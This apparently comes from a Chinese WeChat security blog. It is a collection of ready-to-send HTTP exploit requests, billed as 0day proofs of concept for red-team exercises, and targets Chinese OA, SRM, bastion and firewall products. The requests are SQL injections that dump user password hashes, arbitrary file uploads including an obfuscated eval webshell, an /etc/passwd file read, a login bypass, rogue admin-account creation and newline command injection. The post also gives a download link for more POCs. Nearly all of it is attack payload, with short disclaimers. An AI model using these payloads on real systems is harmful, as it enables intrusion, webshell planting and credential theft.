免责声明
由于传播、利用湘安无事所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负
责,湘安无事及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除
并致歉。谢谢!
0x01 通达OA sql注入漏洞(CVE-2023-4166 )
GET /general/
system
/seal_manage/iweboffice/delete_seal.php?DELETE_STR=
1
)%20and%20(
substr
(DATABASE(),
1
,
1
))=char(
84
)%20and%20(
select
%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(
1
)=(
1
HTTP/
1.1
Host:
127.0
.
0
.
1
:
8080
User-Agent: Mozilla/
5.0
(Windows NT
10.0
; Win64; x64; rv:
109.0
) Gecko/
20100101
Firefox/
116.0
Accept: text/html,application/xhtml+xml,application/xml;
q
=
0
.
9
,image/avif,image/webp,*
/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
0x02 泛微E-Office9文件上传漏洞(CVE-2023-2648 )
POST
/inc/jquery/uploadify/uploadify.php
HTTP/1.1
Host
: 192.168.233.10:8082
User-Agent
: test
Connection
: close
Content-Length
: 493
Accept-Encoding
: gzip
Content-Type
: multipart/form-data
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name=
"Filedata"
; filename=
"666.php"
Content-Type: application/octet-stream
phpinfo();
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
0x03 蓝凌OA前台任意代码执行漏洞
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: www.ynjd.cn:801
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
Content-Length: 42
Content-Type: application/x-www-form-urlencoded
var={
"body"
:{
"file"
:
"file:///etc/passwd"
}}
0X04 汉得SRM tomcat.jsp 登录绕过漏洞
/tomcat.jsp?dataName=role_id&dataValue=1
/tomcat.jsp?dataName=user_id&dataValue=1
然后访问后台:/main.screen
0x05 广联达OA SQL注入漏洞
POST
/Webservice/IM/Config/ConfigService.asmx/GetIMDictionary
HTTP/1.1
Host
: xxx.com
Upgrade-Insecure-Requests
: 1
User-Agent
: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept
: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer
: http://xxx.com:8888/Services/Identification/Server/Incompatible.aspx
Accept-Encoding
: gzip, deflate
Accept-Language
: zh-CN,zh;q=0.9
Cookie
:
Connection
: close
Content-Type
: application/x-www-form-urlencoded
Content-Length
: 88
dasdas=&key=1' UNION ALL
SELECT
top
1812
concat
(F_CODE,
':'
,F_PWD_MD5)
from
T_ORG_USER
--
0x06 广联达OA 后台文件上传漏洞
POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1
Host
: 10.10.10.1:8888
X-Requested-With
: Ext.basex
Accept
: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language
: zh-Hans-CN,zh-Hans;q=0.5
User-Agent
: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept-Encoding
: gzip, deflate
Content-Type
: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
Accept
: */*
Origin
: http://10.10.10.1
Referer
: http://10.10.10.1:8888/Workflow/Workflow.aspx?configID=774d99d7-02bf-42ec-9e27-caeaa699f512&menuitemid=120743&frame=1&modulecode=GTP.Workflow.TaskCenterModule&tabID=40
Cookie
:
Connection
: close
Content-Length
: 421
------WebKitFormBoundaryFfJZ4PlAZBixjELj
Content-Disposition: form-data; filename=
"1.aspx"
;filename=
"1.jpg"
Content-Type: application/text
<%@ Page Language=
"Jscript"
Debug=
true
%>
<%
var
FRWT=
'XeKBdPAOslypgVhLxcIUNFmStvYbnJGuwEarqkifjTHZQzCoRMWD'
;
var
GFMA=Request.Form(
"qmq1"
);
var
ONOQ=FRWT(
19
) + FRWT(
20
) + FRWT(
8
) + FRWT(
6
) + FRWT(
21
) + FRWT(
1
);
eval
(GFMA, ONOQ);
%>
------WebKitFormBoundaryFfJZ4PlAZBixjELj--
0x07 明御运维审计与风险控制系统堡垒机任意用户注册
POST /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://test/wsrpc HTTP/1.1
Host: xxx
Cookie: LANG=zh;
USM=0a0e1f29d69f4b9185430328b44ad990832935dbf1b90b8769d297dd9f0eb848
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99","Chromium";v="100", "Google Chrome";v="100"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/100.0.4896.127 Safari/537.36
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/
webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 1121
version="1.0"?>
<
methodCall
>
<
methodName
>
web.user_add
</
methodName
>
<
params
>
<
param
>
<
value
>
<
array
>
<
data
>
<
value
>
<
string
>
admin
</
string
>
</
value
>
<
value
>
<
string
>
5
</
string
>
</
value
>
<
value
>
<
string
>
XX.XX.XX.XX
</
string
>
</
value
>
<
/
data
>
</
array
>
</
value
>
</
param
>
<
param
>
<
value
>
<
struct
>
<
member
>
<
name
>
uname
</
name
>
<
value
>
<
string
>
deptadmin
</
string
>
</
value
>
</
member
>
<
member
>
<
name
>
name
</
name
>
<
value
>
<
string
>
deptadmin
</
string
>
</
value
>
</
member
>
<
member
>
<
n
ame
>
pwd
</
name
>
<
value
>
<
string
>
Deptadmin@123
</
string
>
</
value
>
</
member
>
<
me
mber
>
<
name
>
authmode
</
name
>
<
value
>
<
string
>
1
</
string
>
</
value
>
</
member
>
<
me
mber
>
<
name
>
deptid
</
name
>
<
value
>
<
string
>
</
string
>
</
value
>
</
member
>
<
membe
r
>
<
name
>
</
name
>
<
value
>
<
string
>
</
string
>
</
value
>
</
member
>
<
member
>
<
n
ame
>
mobile
</
name
>
<
value
>
<
string
>
</
string
>
</
value
>
</
member
>
<
member
>
<
name
>
comment
</
name
>
<
value
>
<
string
>
</
string
>
</
value
>
</
member
>
<
member
>
<
name
>
r
oleid
</
name
>
<
value
>
<
string
>
101
</
string
>
</
value
>
</
member
>
</
struct
>
</
valu
e
>
</
param
>
</
params
>
</
methodCall
>
0x08 深信服应用交付系统命令执行漏洞
POST /rep/login
Host:
10.10
.
10.1
:
85
clsMode=cls_mode_login%0Als%0A&
index
=
index
&log_type=report&loginType=account&page=login&rnd=
0
&userID=admin&userPsw=
123
0x09 网神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞
POST
/?g=obj_app_upfile
HTTP/1.1
Host
: x.x.x.x
Accept
: */*
Accept-Encoding
: gzip, deflate
Content-Length
: 574
Content-Type
: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc
User-Agent
: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-
data
; name=
"MAX_FILE_SIZE"
10000000
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-
data
; name=
"upfile"
; filename=
"vulntest.php"
Content-Type: text/plain
<?php php马?>
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-
data
; name=
"submit_post"
obj_app_upfile
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-
data
; name=
"__hash__"
0
b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundaryJpMyThWnAxbcBBQc--
马儿路径:attachements/xxx.php
0x10 泛微E-Office9文件上传漏洞(CVE-2023-2523)
POST
/inc/jquery/uploadify/uploadify.php
HTTP/1.1
Host
: 192.168.233.10:8082
User-Agent
: test
Connection
: close
Content-Length
: 493
Accept-Encoding
: gzip
Content-Type
: multipart/form-data
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name=
"Filedata"
; filename=
"666.php"
Content-Type: application/octet-stream
phpinfo();
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
上述漏洞POC已全部整理成文档
链接:https://pan.baidu.com/s/1DPqLmo6g_Fil7xLELIGADg?pwd=xaws 提取码:xaws --来自百度网盘超级会员V4的分享
原文始发于微信公众号(湘安无事):HW | 0day漏洞POC来袭~
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论